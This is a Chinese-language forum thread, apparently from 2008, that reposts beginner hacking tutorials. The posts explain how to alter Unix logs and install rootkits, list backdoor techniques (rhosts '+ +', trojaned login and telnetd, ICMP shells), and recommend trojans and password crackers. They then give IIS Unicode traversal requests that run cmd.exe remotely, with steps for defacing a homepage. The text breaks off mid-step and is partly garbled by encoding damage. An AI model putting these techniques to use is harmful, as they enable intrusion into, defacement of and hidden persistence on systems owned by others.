loginlog一記錄一些不正常的L0gin記錄。 <BR>  messages——記錄輸出到系統(tǒng)控制臺(tái)的記錄,另外的信息由Syslog來(lái)生成 <BR>  security記錄一些使用 UUCP系統(tǒng)企圖進(jìn)入限制范圍的事例。 <BR>  sulog記錄使用su命令的記錄。 <BR>  utmp記錄當(dāng)前登錄到系統(tǒng)中的所有用戶,這個(gè)文件伴隨著用戶進(jìn)入和離開(kāi)系統(tǒng)而不斷變化。 <BR>  Utmpx,utmp的擴(kuò)展。 <BR>  wtmp記錄用戶登錄和退出事件。 <BR>  Syslog最重要的日志文件,使用syslogd守護(hù)程序來(lái)獲得。 <BR><BR>  2.隱藏蹤跡 <BR><BR>  攻擊者在獲得系統(tǒng)最高管理員權(quán)限之后就可以隨意修改系統(tǒng)上的文件了(只對(duì)常規(guī) Unix系統(tǒng)而言),包括日志文件,所以一般黑客想要隱藏自己的蹤跡的話,就會(huì)對(duì)日志進(jìn)行修改。最簡(jiǎn)單的方法當(dāng)然就是刪除日志文件了,但這樣做雖然避免了系統(tǒng)管理員根據(jù)IP追蹤到自己,但也明確無(wú)誤地告訴了管理員,系統(tǒng)己經(jīng)被人侵了。所以最常用的辦法是只對(duì)日志文件中有關(guān)自己的那一部分做修改。關(guān)于修改方法的具體細(xì)節(jié)根據(jù)不同的操作系統(tǒng)有所區(qū)別,網(wǎng)絡(luò)上有許多此類功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用戶的信息,使得當(dāng)使用w、who、last等命令查看日志文件時(shí),隱藏掉此用戶的信息。 <BR>管理員想要避免日志系統(tǒng)被黑客修改,應(yīng)該采取一定的措施,例如用打印機(jī)實(shí)時(shí)記錄網(wǎng)絡(luò)日志信息。但這樣做也有弊端,黑客一旦了解到你的做法就會(huì)不停地向日志里寫(xiě)入無(wú)用的信息,使得打印機(jī)不停地打印日志,直到所有的紙用光為止。所以比較好的避免日志被修改的辦法是把所有日志文件發(fā)送到一臺(tái)比較安全的主機(jī)上,即使用loghost。即使是這樣也不能完全避免日志被修改的可能性,因?yàn)楹诳图热荒芄ト脒@臺(tái)主機(jī),也很可能攻入loghost。 <BR><BR>  只修改日志是不夠的,因?yàn)榘倜鼙赜幸宦?,即使自認(rèn)為修改了所有的日志,仍然會(huì)留下一些蛛絲馬跡的。例如安裝了某些后門(mén)程序,運(yùn)行后也可能被管理員發(fā)現(xiàn)。所以,黑客高手可以通過(guò)替換一些系統(tǒng)程序的方法來(lái)進(jìn)一步隱藏蹤跡。這種用來(lái)替換正常系統(tǒng)程序的黑客程序叫做rootkit,這類程序在一些黑客網(wǎng)站可以找到,比較常見(jiàn)的有LinuxRootKit,現(xiàn)在已經(jīng)發(fā)展到了5.0版本了。它可以替換系統(tǒng)的ls、ps、netstat、inetd等等一系列重要的系統(tǒng)程序,當(dāng)替換了ls后,就可以隱藏指定的文件,使得管理員在使用ls命令時(shí)無(wú)法看到這些文件,從而達(dá)到隱藏自己的目的。 <BR><BR>  3.后門(mén) <BR><BR>   一般黑客都會(huì)在攻入系統(tǒng)后不只一次地進(jìn)入該系統(tǒng)。為了下次再進(jìn)入系統(tǒng)時(shí)方便一點(diǎn),黑客會(huì)留下一個(gè)后門(mén),特洛伊木馬就是后門(mén)的最好范例。Unix中留后門(mén)的方法有很多種,下面介紹幾種常見(jiàn)的后門(mén),供網(wǎng)絡(luò)管理員參考防范。 <BR><BR>  &lt;1&gt;密碼破解后門(mén) <BR>  這是入侵者使用的最早也是最老的方法,它不僅可以獲得對(duì)Unix機(jī)器的訪問(wèn),而且可 以通過(guò)破解密碼制造后門(mén)。這就是破解口令薄弱的帳號(hào)。以后即使管理員封了入侵者的當(dāng)前帳號(hào),這些新的帳號(hào)仍然可能是重新侵入的后門(mén)。多數(shù)情況下,入侵者尋找口令薄弱的未使用帳號(hào),然后將口令改的難些。當(dāng)管理員尋找口令薄弱的帳號(hào)是,也不會(huì)發(fā)現(xiàn)這些密碼已修改的帳號(hào)。因而管理員很難確定查封哪個(gè)帳號(hào)。 <BR><BR>  &lt;2&gt;Rhosts + + 后門(mén) <BR>  在連網(wǎng)的Unix機(jī)器中,象Rsh和Rlogin這樣的服務(wù)是基于rhosts文件里的主機(jī)名使用簡(jiǎn) 單的認(rèn)證方法。用戶可以輕易的改變?cè)O(shè)置而不需口令就能進(jìn)入。 入侵者只要向可以訪問(wèn)的某用戶的rhosts文件中輸入"+ +",就可以允許任何人從任何地方無(wú)須口令便能進(jìn) 入這個(gè)帳號(hào)。特別當(dāng)home目錄通過(guò)NFS向外共享時(shí),入侵者更熱中于此。這些帳號(hào)也成 了入侵者再次侵入的后門(mén)。許多人更喜歡使用Rsh,因?yàn)樗ǔH鄙偃罩灸芰? 許多管理員經(jīng)常檢查 "+ +",所以入侵者實(shí)際上多設(shè)置來(lái)自網(wǎng)上的另一個(gè)帳號(hào)的主機(jī)名和 用戶名,從而不易被發(fā)現(xiàn)。 <BR><BR>  &lt;3&gt;校驗(yàn)和及時(shí)間戳后門(mén) <BR>  早期,許多入侵者用自己的trojan程序替代二進(jìn)制文件。系統(tǒng)管理員便依靠時(shí)間戳和系 統(tǒng)校驗(yàn)和的程序辨別一個(gè)二進(jìn)制文件是否已被改變,如Unix里的sum程序。入侵者又發(fā)展了使trojan文件和原文件時(shí)間戳同步的新技術(shù)。它是這樣實(shí)現(xiàn)的: 先將系統(tǒng)時(shí)鐘撥 回到原文件時(shí)間,然后調(diào)整trojan文件的時(shí)間為系統(tǒng)時(shí)間。一旦二進(jìn)制trojan文件與 原來(lái)的精確同步,就可以把系統(tǒng)時(shí)間設(shè)回當(dāng)前時(shí)間。Sum程序是基于CRC校驗(yàn),很容易 騙過(guò)。入侵者設(shè)計(jì)出了可以將trojan的校驗(yàn)和調(diào)整到原文件的校驗(yàn)和的程序。MD5是被 大多數(shù)人推薦的,MD5使用的算法目前還沒(méi)人能騙過(guò)。</DIV>
      5#
       樓主| 發(fā)表于 2008-9-25 18:49:56 | 只看該作者
      <DIV class=tpc_content id=read_489>黑客初級(jí)技術(shù)講解(下)<BR><BR><BR>  &lt;4&gt;Login后門(mén) <BR>  在Unix里,login程序通常用來(lái)對(duì)telnet來(lái)的用戶進(jìn)行口令驗(yàn)證. 入侵者獲取login.c的 原代碼并修改,使它在比較輸入口令與存儲(chǔ)口令時(shí)先檢查后門(mén)口令。如果用戶敲入后門(mén) 口令,它將忽視管理員設(shè)置的口令讓你長(zhǎng)驅(qū)直入。這將允許入侵者進(jìn)入任何帳號(hào),甚至 是root。由于后門(mén)口令是在用戶真實(shí)登錄并被日志記錄到utmp和wtmp前產(chǎn)生一個(gè)訪問(wèn) 的,所以入侵者可以登錄獲取shell卻不會(huì)暴露該帳號(hào)。管理員注意到這種后門(mén)后,便 用"strings"命令搜索login程序以尋找文本信息. 許多情況下后門(mén)口令會(huì)原形畢露。入侵者就開(kāi)始加密或者更好的隱藏口令,使strings命令失效&lt;5&gt;Telnetd后門(mén) <BR>  當(dāng)用戶telnet到系統(tǒng),監(jiān)聽(tīng)端口的inetd服務(wù)接受連接隨后遞給in.telnetd,由它運(yùn)行 login.一些入侵者知道管理員會(huì)檢查login是否被修改,就著手修改in.telnetd. 在in.telnetd內(nèi)部有一些對(duì)用戶信息的檢驗(yàn),比如用戶使用了何種終端. 典型的終端 設(shè)置是Xterm或者VT100.入侵者可以做這樣的后門(mén),當(dāng)終端設(shè)置為"letmein"時(shí)產(chǎn)生一 個(gè)不要任何驗(yàn)證的shell. 入侵者已對(duì)某些服務(wù)作了后門(mén),對(duì)來(lái)自特定源端口的連接產(chǎn) 生一個(gè)shell。 <BR><BR>  &lt;6&gt;服務(wù)后門(mén) <BR>  幾乎所有網(wǎng)絡(luò)服務(wù)曾被入侵者作過(guò)后門(mén). Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本隨處多是。有的只是連接到某個(gè)TCP端口的shell,通過(guò)后門(mén)口令就能獲取訪問(wèn)。這些程序有時(shí)用刺媧□?Ucp這樣不用的服務(wù),或者被加入inetd.conf 作為一個(gè)新的服務(wù),管理員應(yīng)該非常注意那些服務(wù)正在運(yùn)行,并用MD5對(duì)原服務(wù)程序做校驗(yàn)。 <BR><BR>  &lt;7&gt;Cronjob后門(mén) <BR>  Unix上的Cronjob可以按時(shí)間表調(diào)度特定程序的運(yùn)行。入侵者可以加入后門(mén)shell程序 使它在1AM到2AM之間運(yùn)行,那么每晚有一個(gè)小時(shí)可以獲得訪問(wèn)。也可以查看cronjob中 經(jīng)常運(yùn)行的合法程序,同時(shí)置入后門(mén)。 <BR><BR>  &lt;8&gt;庫(kù)后門(mén) <BR>  幾乎所有的UNIX系統(tǒng)使用共享庫(kù),共享庫(kù)用于相同函數(shù)的重用而減少代碼長(zhǎng)度。一些入侵者在象crypt.c和_crypt.c這些函數(shù)里作了后門(mén);象login.c這樣的程序調(diào)用了 crypt()。當(dāng)使用后門(mén)口令時(shí)產(chǎn)生一個(gè)shell。 因此,即使管理員用MD5檢查login程序,仍然能產(chǎn)生一個(gè)后門(mén)函數(shù),而且許多管理員并不會(huì)檢查庫(kù)是否被做了后門(mén)。對(duì)于許多入侵者來(lái)說(shuō)有一個(gè)問(wèn)題: 一些管理員對(duì)所有東西多作了MD5校驗(yàn),有一種辦法是入侵者對(duì)open()和文件訪問(wèn)函數(shù)做后門(mén)。后門(mén)函數(shù)讀原文件但執(zhí)行trojan后門(mén)程序。所以 當(dāng)MD5讀這些文件時(shí),校驗(yàn)和一切正常,但當(dāng)系統(tǒng)運(yùn)行時(shí)將執(zhí)行trojan版本的,即使trojan庫(kù)本身也可躲過(guò)MD5校驗(yàn),對(duì)于管理員來(lái)說(shuō)有一種方法可以找到后門(mén),就是靜態(tài)編連MD5校驗(yàn)程序然后運(yùn)行,靜態(tài)連接程序不會(huì)使用trojan共享庫(kù)。 <BR><BR>  &lt;9&gt;內(nèi)核后門(mén) <BR>  內(nèi)核是Unix工作的核心,用于庫(kù)躲過(guò)MD5校驗(yàn)的方法同樣適用于內(nèi)核級(jí)別,甚至連靜態(tài) 連接多不能識(shí)別. 一個(gè)后門(mén)作的很好的內(nèi)核是最難被管理員查找的,所幸的是內(nèi)核的 后門(mén)程序還不是隨手可得,每人知道它事實(shí)上傳播有多廣。 <BR><BR> &lt;10&gt;文件系統(tǒng)后門(mén) <BR>  入侵者需要在服務(wù)器上存儲(chǔ)他們的掠奪品或數(shù)據(jù),并不能被管理員發(fā)現(xiàn),入侵者的文章常是包括exploit腳本工具,后門(mén)集,sniffer日志,email的備分,原代碼,等等!有時(shí)為了防止管理員發(fā)現(xiàn)這么大的文件,入侵者需要修補(bǔ)"ls","du","fsck"以隱匿特定的目錄和文件,在很低的級(jí)別,入侵者做這樣的漏洞: 以專有的格式在硬盤(pán)上割出一部分,且表示為壞的扇區(qū)。因此入侵者只能用特別的工具訪問(wèn)這些隱藏的文件,對(duì)于普通的管理員來(lái)說(shuō),很難發(fā)現(xiàn)這些"壞扇區(qū)"里的文件系統(tǒng),而它又確實(shí)存在。 <BR><BR>  &lt;11&gt;Boot塊后門(mén) <BR>  在PC世界里,許多病毒藏匿與根區(qū),而殺病毒軟件就是檢查根區(qū)是否被改變。Unix下,多數(shù)管理員沒(méi)有檢查根區(qū)的軟件,所以一些入侵者將一些后門(mén)留在根區(qū)。 <BR>. 所以更多的管理員是 用MD5校驗(yàn)和檢測(cè)這種后門(mén)的。 <BR>&lt;12&gt;隱匿進(jìn)程后門(mén) <BR>  入侵者通常想隱匿他們運(yùn)行的程序,這樣的程序一般是口令破解程序和監(jiān)聽(tīng)程序 (sniffer),有許多辦法可以實(shí)現(xiàn),這里是較通用的: 編寫(xiě)程序時(shí)修改自己的argv[] 使它看起來(lái)象其他進(jìn)程名??梢詫niffer程序改名類似in.syslog再執(zhí)行,因此 當(dāng)管理員用"ps"檢查運(yùn)行進(jìn)程時(shí),出現(xiàn) 的是標(biāo)準(zhǔn)服務(wù)名??梢孕薷膸?kù)函數(shù)致使 "ps"不能顯示所有進(jìn)程,可以將一個(gè)后門(mén)或程序嵌入中斷驅(qū)動(dòng)程序使它不會(huì)在進(jìn)程表顯現(xiàn)。使用這個(gè)技術(shù)的一個(gè)后門(mén)例子是 <BR><BR>  amod.tar.gz : <BR>  <A href="http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html" target=_blank><FONT color=#2f5fa1>http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html</FONT></A>網(wǎng)絡(luò)通行. 這些網(wǎng)絡(luò)通行后 門(mén)有時(shí)允許入侵者通過(guò)防火墻進(jìn)行訪問(wèn)。有許多網(wǎng)絡(luò)后門(mén)程序允許入侵者建立某個(gè)端 口號(hào)并不用通過(guò)普通服務(wù)就能實(shí)現(xiàn)訪問(wèn). 因?yàn)檫@是通過(guò)非標(biāo)準(zhǔn)網(wǎng)絡(luò)端口的通行,管理 員可能忽視入侵者的足跡. 這種后門(mén)通常使用TCP,UDP和ICMP,但也可能是其他類型報(bào)文。 <BR><BR>  &lt;14&gt;TCP Shell 后門(mén) <BR>  入侵者可能在防火墻沒(méi)有阻塞的高位TCP端口建立這些TCP Shell后門(mén). 許多情況下,他 們用口令進(jìn)行保護(hù)以免管理員連接上后立即看到是shell訪問(wèn). 管理員可以用netstat 命令查看當(dāng)前的連接狀態(tài),那些端口在偵聽(tīng),目前連接的來(lái)龍去脈. 通常這些后門(mén)可 以讓入侵者躲過(guò)TCP Wrapper技術(shù). 這些后門(mén)可以放在SMTP端口,許多防火墻允許 e-mail通行的. <BR><BR>  &lt;15&gt;UDP Shell 后門(mén) <BR>  管理員經(jīng)常注意TCP連接并觀察其怪異情況,而UDP Shell后門(mén)沒(méi)有這樣的連接,所以 netstat不能顯示入侵者的訪問(wèn)痕跡,許多防火墻設(shè)置成允許類似DNS的UDP報(bào)文的通行,通常入侵者將UDP Shell放置在這個(gè)端口,允許穿越防火墻。 <BR><BR>  &lt;16&gt;ICMP Shell 后門(mén) <BR>  Ping是通過(guò)發(fā)送和接受ICMP包檢測(cè)機(jī)器活動(dòng)狀態(tài)的通用辦法之一。許多防火墻允許外界ping它內(nèi)部的機(jī)器,入侵者可以放數(shù)據(jù)入Ping的ICMP包,在ping的機(jī)器間形成一個(gè)shell通道,管理員也許會(huì)注意到Ping包暴風(fēng),但除了他查看包內(nèi)數(shù)據(jù),否者入侵者不會(huì)暴露。 <BR><BR>  &lt;17&gt;加密連接 <BR>  管理員可能建立一個(gè)sniffer試圖某個(gè)訪問(wèn)的數(shù)據(jù),但當(dāng)入侵者給網(wǎng)絡(luò)通行后門(mén)加密 后,就不可能被判定兩臺(tái)機(jī)器間的傳輸內(nèi)容了。</DIV>
      6#
       樓主| 發(fā)表于 2008-9-25 18:50:22 | 只看該作者
      <DIV class=tpc_content id=read_490>基礎(chǔ)知識(shí)(1)<BR><BR><BR>我認(rèn)為這是一套適合初學(xué)者由淺到深的文章,所以強(qiáng)烈推薦給大家,作者從基礎(chǔ)講到最近比較火的漏洞,可能有些人看來(lái)是淺了些,但是的確很適合想干點(diǎn)啥但又不知道怎么辦的菜鳥(niǎo)們 。<BR><BR>第一節(jié),伸展運(yùn)動(dòng)。這節(jié)操我們要準(zhǔn)備道具,俗話說(shuō):“工欲善其事,必先利其器”(是這樣嗎?哎!文化低……)說(shuō)得有道理,我們要學(xué)習(xí)黑客技術(shù),一點(diǎn)必要的工具必不可少。 <BR><BR>1,一臺(tái)屬于自己的可以上網(wǎng)的電腦。這樣你可以有充分的支配權(quán),上網(wǎng)不用說(shuō),否則你怎么看到我的文章?wap?呵呵!屬于自己很重要,否則安全性是個(gè)很大的問(wèn)題。第一點(diǎn)相信大家沒(méi)有問(wèn)題。 <BR><BR>2,windows2000/nt,別和我說(shuō)98/me,他們是你們同學(xué)用來(lái)玩游戲的!(當(dāng)然,我也是鐵桿game fan)對(duì)網(wǎng)絡(luò)支持極差,命令受限制,很多軟件又不能用,對(duì)黑客來(lái)說(shuō)使用起來(lái)絆手絆腳,非常不利。這里我推薦2000,這是一個(gè)很成熟的系統(tǒng)(漏洞還是有一堆)。推薦雙系統(tǒng),這樣黑玩搭配,干活不累。 <BR><BR>3,冰河。中國(guó)第一木馬,中者數(shù)不勝數(shù),國(guó)人驕傲。雖然用冰河根本不能算黑客,但它確實(shí)能培養(yǎng)你對(duì)黑客的興趣,同時(shí)幫助你了解網(wǎng)絡(luò),相信很多黑客同學(xué)都是這樣起步的。靜止寫(xiě)的那篇冰河教程很不錯(cuò),大家仔細(xì)看看。而且,以后你學(xué)會(huì)入侵服務(wù)器后,用冰河操作也會(huì)減少工作量(我是懶蟲(chóng),爽?。?<BR><BR>4,oicq。我們學(xué)黑客,可不是學(xué)泡mm!bfctx你………… 息怒息怒!我們當(dāng)然是學(xué)黑客,但不要忘了,眾人拾柴火更高,我們通過(guò)cshu的成員列表,互相聯(lián)系幫助,對(duì)提高水平很有幫助!另外我要廢話一句:據(jù)我了解,現(xiàn)在黑客網(wǎng)站下載最多的都是針對(duì)oicq的破解工具,我個(gè)人認(rèn)為很無(wú)聊,偷個(gè)密碼代表什么,浪費(fèi)時(shí)間!最后補(bǔ)充:mm不能不泡。(誰(shuí)砸我???。。?<BR><BR>5,superscan。很好用的端口掃描器,速度超快,功能一流,一旦擁有,別無(wú)所求……(打?。。┎徽撌钦夷抉R受害者,還是掃服務(wù)器端口,它都非常有效,cshu強(qiáng)烈推薦! <BR><BR>6,一本筆記本/便條,網(wǎng)上資料相當(dāng)多,黑客處理的也是非常之多。良好的習(xí)慣決定了你的效率,準(zhǔn)備一本筆記本,記錄下你的成果,肉雞,木馬利用,命令,密碼……堅(jiān)持一下,你會(huì)發(fā)現(xiàn)你的效率大幅上升的! <BR><BR>7,lc3.著名nt/2000sam破解程序,有時(shí)我們拿不到足夠權(quán)限,又沒(méi)好辦法,那么lc3是最好的解決辦法,只要你拿的到sam,你就是服務(wù)器它爺爺!本站有其破解程序,支持了暴力破解! <BR><BR>8,程序合并。這是玩木馬必需的,雖然木馬是很低的手段,但有時(shí)配合巧辦法(以后我會(huì)介紹)確實(shí)能夠達(dá)到意想不到的效果,朋友們可以在空閑時(shí)玩玩木馬,很有趣,若你能巧妙的騙過(guò)mm,那么webmaster也可能被你騙倒:〉 (比較理想化) <BR><BR>9,流光4for 2000/nt。可能是世界上最好的綜合類黑軟!中國(guó)的驕傲,它集成了很全的漏洞信息,速度快,方法多,對(duì)有漏洞的主機(jī)是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級(jí)吐血推薦??! <BR><BR>10,良好的心態(tài),穩(wěn)定的情緒,刻苦鉆研的精神,刨根問(wèn)底的作風(fēng),打掃房間的習(xí)慣。黑客是門(mén)很高深的學(xué)問(wèn),不要幻想一步登天,失敗是常有的事,千萬(wàn)不可灰心。在那么多黑軟的包圍下,切不可完全依賴他們,一定要了解它們利用什么原理工作。對(duì)任何一個(gè)小問(wèn)題,小細(xì)節(jié),一定要問(wèn)清楚,cshu就是給大家互相交流的場(chǎng)所哦!黑完后不要得意忘形,打掃戰(zhàn)場(chǎng)也很重要,以防萬(wàn)一。 <BR><BR>第一節(jié)操完,可能很無(wú)聊,我就這點(diǎn)水平,大家見(jiàn)諒!這里我說(shuō)一句大話:做完菜鳥(niǎo)操,包你會(huì)黑簡(jiǎn)單的站(哎喲!心慌了!) <BR><BR>下一節(jié)操我們要介紹如何掌握一臺(tái)主機(jī)的基本信息,期待中…… <BR><BR>真是太對(duì)不起大家了,隔了那么久才寫(xiě)這篇教程,我這幾天實(shí)在太忙,大家還是體諒一下我吧,好了,開(kāi)始做操。 <BR><BR>今天的內(nèi)容是獲得主機(jī)的信息。 我們要黑一臺(tái)主機(jī),首先要了解它的信息,包括它的類型,用戶列表,目錄,端口,漏洞等等。 <BR><BR>首先我們我們要找一臺(tái)主機(jī)來(lái)練手,隨便挑吧!<A href="http://www.flyingfish.com/" target=_blank><FONT color=#2f5fa1>www.flyingfish.com</FONT></A>(亂說(shuō)的) <BR><BR>第一部,呵呵,先在ie里看看吧,mmmm.....做的還行,挺精致的!主要是我們肯定了它現(xiàn)在是正常的。 然后,我們應(yīng)該知道它的ip,很簡(jiǎn)單,ping它一下就可以了。 <BR><BR>ping <A href="http://www.flyingfish.com/" target=_blank><FONT color=#2f5fa1>www.flyingfish.com</FONT></A>,看看窗口里有了什么?是不是有三行回應(yīng),其中的111.111.222.222就是ip了(還是胡說(shuō)的,一個(gè)例子)。有人是不是要問(wèn),我這里怎么沒(méi)有。那可能是兩個(gè)原因,第一,你打錯(cuò)命令了;第二,該主機(jī)裝了防火墻,禁止ping,不過(guò)這種可能很小。 <BR><BR>知道了ip,下一步應(yīng)該確定端口了。下面是一些常用的端口的默認(rèn)值 <BR><BR>21--ftp 重要哦 <BR><BR>23--telnet 歡呼吧 <BR><BR>25-smtp 盡管重要,但似乎沒(méi)什么可利用的 <BR><BR>53--domain 同上 <BR><BR>79--finger 可知道用戶信息了 <BR><BR>80--http 要看網(wǎng)頁(yè),沒(méi)它不行吧 <BR><BR>110--pop 收信的 <BR><BR>139--netbios 共享用的,很有利用價(jià)值哦 <BR><BR>3389--win2000超級(jí)終端 呵呵,這個(gè)好! <BR><BR>其實(shí)端口有上千種,這些最最常用 <BR><BR>我們?cè)趺粗婪?wù)器有什么端口打開(kāi)呢??去找個(gè)掃描器吧,x-scan ,super scan,flux等等很多哦。這里我推薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計(jì)大家不會(huì)有問(wèn)題,輕輕幾點(diǎn),打開(kāi)的端口就出現(xiàn)了。不錯(cuò)不錯(cuò),上面說(shuō)到的都有(太理想化了吧!) <BR><BR>那么我們?cè)撊绾螒?yīng)對(duì)呢? <BR><BR>ps:忘了說(shuō)一聲,順便掃一下7626,冰河有也說(shuō)不準(zhǔn)哦:) <BR><BR>若有ftp,那就用用匿名登陸。自己動(dòng)手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望 <BR><BR>telnet在!好!telnet 111.111.222.222,出現(xiàn)窗口了吧!嗯?要密碼?看來(lái)網(wǎng)管還不是超級(jí)注意文明用語(yǔ):)隨便猜個(gè),錯(cuò)了,閃人! <BR><BR>smtp,看著它,無(wú)奈 <BR><BR>domain,一般它帶了局域網(wǎng)了 <BR><BR>finger 可以知道用戶列表了,不好,忘了用法了,幸好finger很少出現(xiàn) <BR><BR>80肯定在,我們等會(huì)來(lái)對(duì)付它 <BR><BR>110 有smtp,pop在也不奇怪了 <BR><BR>139 找個(gè)掃描器來(lái)找找有沒(méi)有露在外面的共享吧,日后也用得著 <BR><BR>3389 太太太好了!!打開(kāi)客戶端吧,用輸入法漏洞試試,成了就干了它!不成也沒(méi)事,我們以后完全控制它3389會(huì)很方便的。 <BR><BR>端口掃完了!我們?cè)诙嗔私馑稽c(diǎn)吧!追捕大家都知道吧,其實(shí)用它獲取主機(jī)信息也不賴哦。打開(kāi)追捕,輸入ip,選擇智能追捕,是不是有很多信息出來(lái)了?雖然不能直接利用,但畢竟我們有對(duì)它有了進(jìn)一步的了解。 <BR><BR>掌握了那么多信息,我們?cè)撟鳇c(diǎn)什么了,一般黑客入侵都是靠著系統(tǒng)漏洞,不會(huì)都傻傻地去暴力破解的。我們現(xiàn)在就要看看它有什么漏洞。 <BR><BR>對(duì)漏洞大家可能不太了解,我這里也不能一一說(shuō)明了,太多了,感興趣的話去論壇找freedom吧! <BR><BR>目前廣泛利用和存在的漏洞有:unicode,unicode后續(xù),iis溢出,.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至于如何確定,呵呵,絕對(duì)不會(huì)是一行一行地在ie中試吧,拿出x-scan吧,很好的掃描器哦! <BR><BR>稍微設(shè)置一下就上路吧!過(guò)了一會(huì),呵呵,報(bào)告出來(lái)了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細(xì)的信息,大家看吧,總比我說(shuō)的準(zhǔn)了。 <BR><BR>現(xiàn)在這臺(tái)主機(jī)已經(jīng)和我們成為親戚了,要讓這位親愛(ài)的親戚做點(diǎn)事,就要開(kāi)始各種攻擊了,下回我們就探討一下最最可愛(ài)的unicode漏洞,各位可能就會(huì)在unicode中完成第一次黑客體驗(yàn),再見(jiàn):)</DIV>
      7#
       樓主| 發(fā)表于 2008-9-25 18:50:47 | 只看該作者
      <DIV class=tpc_content id=read_491>基礎(chǔ)知識(shí)(2)<BR><BR><BR>今天我們談?wù)剈nicode漏洞,這可是基礎(chǔ)中的基礎(chǔ),重點(diǎn)里的重點(diǎn),不懂的一定要好好學(xué)。 <BR><BR>2000年10月17日中聯(lián)綠盟發(fā)布了以下的安全公告: <BR><BR>微軟IIS 4.0 / 5.0 擴(kuò)展UNICODE目錄遍歷漏洞 <BR><BR>遠(yuǎn)程漏洞:是 <BR><BR>本地漏洞:是 <BR><BR>發(fā)布日期:2000年10月17日 <BR><BR>更新日期:2000年10月17日 <BR><BR>受影響的版本: <BR><BR>Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 <BR><BR>這可是中國(guó)乃至全球網(wǎng)絡(luò)安全界的一次大變節(jié),入侵nt/2000系統(tǒng)變得如此簡(jiǎn)單,不打補(bǔ)丁的死路一條。<BR><BR>下面開(kāi)始正式學(xué)習(xí): <BR><BR>一,UNICODE漏洞的原理 <BR><BR>此漏洞從中文IIS4.0+SP6開(kāi)始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中國(guó)臺(tái)灣繁體中文也同樣存在這樣的漏洞。 <BR><BR>中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中 <BR><BR>%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' <BR><BR>%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' <BR><BR>在NT4中/編碼為%c1%9c <BR><BR>在英文版里: WIN2000英文版%c0%af <BR><BR>在中文win2k里:%c1%1c <BR><BR>此外還有多種編碼,不一一闡述。 <BR><BR>本文例子均以win2k為準(zhǔn),其他類型請(qǐng)自行替換。<BR><BR>基礎(chǔ)知識(shí)(3)<BR><BR><BR>二,一切從基礎(chǔ)開(kāi)始 <BR><BR>由于winnt\system32\cmd.exe的存在,使遠(yuǎn)程執(zhí)行命令變?yōu)榭赡?,在瀏覽器里輸入以下請(qǐng)求:(假設(shè)11.11.22.22有漏洞) <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir <BR><BR>學(xué)過(guò)dos的應(yīng)該可以看懂,其實(shí)就是利用當(dāng)中的非法請(qǐng)求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤(pán),或者目錄級(jí)數(shù)有改動(dòng),可能會(huì)引起請(qǐng)求失敗。 <BR><BR>如果成功,那么在瀏覽區(qū)可看到如下信息: <BR><BR>Directory of C:\inetpub\scripts <BR><BR>2000-09-28 15:49 〈DIR〉 . <BR><BR>2000-09-28 15:49 〈DIR〉 .. (假設(shè)目錄中沒(méi)有文件,實(shí)際上有一大堆) <BR><BR>是不是有自己機(jī)器的感覺(jué)了,正點(diǎn)!就是這種感覺(jué)! <BR><BR>cmd.exe相當(dāng)與dos里的command.com,因此,我們可以執(zhí)行很多命令了! <BR><BR><A href="http://11.11.22.22/msadc/..%c1%1" target=_blank><FONT color=#2f5fa1>http://11.11.22.22/msadc/..%c1%1</FONT></A> ... em32/cmd.exe?/c+dir (這個(gè)命令同樣道理) <BR><BR>大家請(qǐng)注意:/c后面的+,實(shí)際上,他就是空格,請(qǐng)記牢!dir開(kāi)始就是dos命令了,我們可以更改一下: <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe <BR><BR>會(huì)dos的朋友一定懂其意義了,不懂的請(qǐng)去看書(shū) . <BR><BR>不用說(shuō),大家也知道我們就可以利用它來(lái)對(duì)有漏洞的機(jī)器展開(kāi)攻擊了! <BR><BR>三,實(shí)戰(zhàn)演練 <BR><BR>1,修改主頁(yè)?。ㄊ遣皇呛芩浚?<BR><BR>一般主頁(yè)位置在c:\inetpub\wwwroot下,但要是改了路徑,就需要找找了。 <BR><BR>最方便的方法:在瀏覽器里輸入 <A href="http://11.11.22.22/.ida" target=_blank><FONT color=#2f5fa1>http://11.11.22.22/.ida</FONT></A>要是有漏洞,那在瀏?..皇俏頤塹氖籽 ?/a&gt; <BR><BR>分析法:用dir看各個(gè)盤(pán)符的根目錄,看可疑的就進(jìn)去看,運(yùn)氣好的在一分鐘里找到,這要看運(yùn)氣和直覺(jué)。 <BR><BR>dir/s法:首先在看其主頁(yè),找個(gè)圖片或連接,看它的文件名,比如,11.11.22.22首頁(yè)上有一幅圖片,右擊,屬性,看到了嗎?iloveu.gif,然后我們利用unicode輸入這條命令dir c:\iloveu.gif /s意味著查找c盤(pán)下所有目錄里的iloveu.gif,注意實(shí)際應(yīng)用時(shí)別忘了把空格改為+,如果沒(méi)有繼續(xù)找d盤(pán),很快就能確定主頁(yè)目錄的。 <BR><BR>找到了目錄,就要對(duì)它開(kāi)刀了!一般默認(rèn)收頁(yè)為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個(gè),現(xiàn)在我們確定11.11.22.22中為index.htm <BR><BR>那么我們就修改它吧! <BR><BR>最方便的方法:echo法。echo是一個(gè)系統(tǒng)命令,主要用于設(shè)置回應(yīng)開(kāi)關(guān),而echo cshu 